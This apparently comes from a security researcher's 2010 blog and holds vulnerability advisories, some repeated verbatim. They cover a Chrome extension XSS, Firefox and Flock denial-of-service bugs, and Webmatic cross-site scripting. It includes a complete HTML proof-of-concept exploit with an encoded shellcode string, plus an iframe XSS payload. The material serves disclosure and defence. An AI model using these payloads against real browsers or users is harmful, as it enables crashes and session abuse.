######################################
Gmail Checker plus Chrome extension XSS
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html
Exploit available:yes
#######################################
So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)
has a flaw that allow attackers to make XSS style attacks.
All extensions runs over his origin and no have way to altered data from extension or get sensitive data like , email account or password etc..
if we look how many users have instaled this extension =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
303,711 users have instaled it (WoW)
############
explanation
############
Google Mail Checker Plus allows users to view wen they have a new mail and
view a preview of the mail ....
if a attacker compose a new mail with html or javascript code in subject form field and send it to victim´s the code is executed wen Victim´s click in the extension to view the mail and wen victim´s accept the alert and view a preview of mail the iframe is executed too.
Gmail is a safe place , but the extension to manage it can be a potential
vector to attack it.
For example send a email With a logout acction in gmail in subject
"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>
it closes the sesion on gmmail , this is a XSRF , and , in the case what you say aa
it is executed in context and the location.href value is "about:blank"
So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401
The developer has release a patch version in trunk =>
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js
please donload it and copy to your extension folder to solve it.
See Diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0
######################€nd#################################
.
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion DoS
Friday, April 09, 2010
##################################
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion
error console DoS
Vendor URL:http://www.mozilla.com
vendor URL:http://www.flock.com/
Advisore:http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html
###################################
Firefox and Flock Browsers can hang with a malformed page,
and wen try to view error console firefox and flock crash
due to a uncaught excepcion and this is a out of memory
error.
################
Versions
################
firefox 3.6.2 and 3.6.3 vulnerable
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=557228
Flock 2.5 vulnerable
#################
Proof of Concept
#################
<html>
<head>
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title>
</head>
<body onload="javascript:alert('Please Press Ctrl+Shift+J');">
<script language='JavaScript'>
var n=unescape('%uf1a4%u7ffd');
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!>
<!-- Shellcode calc.exe but does not work --!>
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');
for(var i=0;i<64;i++){
n=n+n;
document.write('<script>throw n+s;</scr'+'ipt>');
}
</script>
</head>
<body>
<center><h1> Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 </h1>
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affects Flock and Firefox.
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)</h3>
</center></body>
</html>
###################€nd ##########################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion
error console DoS
Vendor URL:http://www.mozilla.com
vendor URL:http://www.flock.com/
Advisore:http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html
###################################
Firefox and Flock Browsers can hang with a malformed page,
and wen try to view error console firefox and flock crash
due to a uncaught excepcion and this is a out of memory
error.
################
Versions
################
firefox 3.6.2 and 3.6.3 vulnerable
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=557228
Flock 2.5 vulnerable
#################
Proof of Concept
#################
<html>
<head>
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title>
</head>
<body onload="javascript:alert('Please Press Ctrl+Shift+J');">
<script language='JavaScript'>
var n=unescape('%uf1a4%u7ffd');
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!>
<!-- Shellcode calc.exe but does not work --!>
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');
for(var i=0;i<64;i++){
n=n+n;
document.write('<script>throw n+s;</scr'+'ipt>');
}
</script>
</head>
<body>
<center><h1> Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 </h1>
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affects Flock and Firefox.
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)</h3>
</center></body>
</html>
###################€nd ##########################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Flock browser marquee tag DoS
Thursday, April 01, 2010
############################################
Flock browser marquee tag DoS
advisore:http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html
############################################
Flock browser contains a flaw that may allow a remote denial of service.
The issue is triggered when an Victim visit a specially crafted web page
with a lot of marquee html tag and it will result in loss of availability
( DoS ) for Browser and posible memory corruption.
This bug was first discover by '599eme Man flouf@live.fr' and this
is a extended research about it, he was discovered in those browsers:
Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1
and i test it in :
Flock Browser 1.2.6 vulnerable
Flock Browser 2.5 vulnerable
a sample code can be found/download here =>
http://www.exploit-db.com/exploits/11347
########################€nd ###################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Flock browser marquee tag DoS
advisore:http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html
############################################
Flock browser contains a flaw that may allow a remote denial of service.
The issue is triggered when an Victim visit a specially crafted web page
with a lot of marquee html tag and it will result in loss of availability
( DoS ) for Browser and posible memory corruption.
This bug was first discover by '599eme Man flouf@live.fr' and this
is a extended research about it, he was discovered in those browsers:
Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1
and i test it in :
Flock Browser 1.2.6 vulnerable
Flock Browser 2.5 vulnerable
a sample code can be found/download here =>
http://www.exploit-db.com/exploits/11347
########################€nd ###################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Webmatic 3.0.3 Multiple cross.site scripting
Friday, March 19, 2010
#################################
Webmatic 3.0.3 Multiple cross.site scripting
Vendor URL:http://www.valarsoft.com/
Advisore: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html
Vendor notified: YES
#################################
Webmatic contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate multiple variables and form fields upon
submission to the 'index.php' script. This could allow a
user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
##############
Versions
##############
valarsoft webmatic 3.0.3
It´s posible that prior versions
are afected
################
TimeLIne
##############
Discovered 13-01-2010
Vendor notify: 14-03-2010
vendor response:15-03-2010
Disclosure: 19-03-2010
###############
Private messages
################
Subject field form is vulnerable
a attacker can compose a PM with a malformed title
and it is executed wen the victims view his inbox
or open the PM.
#################
Forums
#################
Search field form ,filer variable
and title form field affected.
a attacker can compose a post with a malformed title
and wen a victim try to browse the forum the xss is
executed, also the attacker can compose a search url
with xss in filter variable or put the xss in search
form field to execute it.
##################
Chat room
###################
Nickname form field affected
a attacker can use a malformed nick name with xss and
wen he join in a channel the xss is executed in all
channel´s users.
######################
News
####################
Title form filed affected
a attacker can compose a new with a malformed title and
wen a user browse the news sections the xss is executed
also if the new has a "resume" in home page, all users
wen load the page are afected by xss.
pg variable affected
a attacker can compose a malformed URL in news sections and
insert some xss code in 'pg' variable , wen a victim clink in
this url the xss is executed.
#########################
banners section
#########################
Title and label form fields
A remote user can add a banner
with a malformed title or/and malformed label
wen the attacker visit his banner the xss is executed
in his own banner management.
Also if a victim visit this banner the xss is executed.
############################€ND#############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Webmatic 3.0.3 Multiple cross.site scripting
Vendor URL:http://www.valarsoft.com/
Advisore: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html
Vendor notified: YES
#################################
Webmatic contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate multiple variables and form fields upon
submission to the 'index.php' script. This could allow a
user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
##############
Versions
##############
valarsoft webmatic 3.0.3
It´s posible that prior versions
are afected
################
TimeLIne
##############
Discovered 13-01-2010
Vendor notify: 14-03-2010
vendor response:15-03-2010
Disclosure: 19-03-2010
###############
Private messages
################
Subject field form is vulnerable
a attacker can compose a PM with a malformed title
and it is executed wen the victims view his inbox
or open the PM.
#################
Forums
#################
Search field form ,filer variable
and title form field affected.
a attacker can compose a post with a malformed title
and wen a victim try to browse the forum the xss is
executed, also the attacker can compose a search url
with xss in filter variable or put the xss in search
form field to execute it.
##################
Chat room
###################
Nickname form field affected
a attacker can use a malformed nick name with xss and
wen he join in a channel the xss is executed in all
channel´s users.
######################
News
####################
Title form filed affected
a attacker can compose a new with a malformed title and
wen a user browse the news sections the xss is executed
also if the new has a "resume" in home page, all users
wen load the page are afected by xss.
pg variable affected
a attacker can compose a malformed URL in news sections and
insert some xss code in 'pg' variable , wen a victim clink in
this url the xss is executed.
#########################
banners section
#########################
Title and label form fields
A remote user can add a banner
with a malformed title or/and malformed label
wen the attacker visit his banner the xss is executed
in his own banner management.
Also if a victim visit this banner the xss is executed.
############################€ND#############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)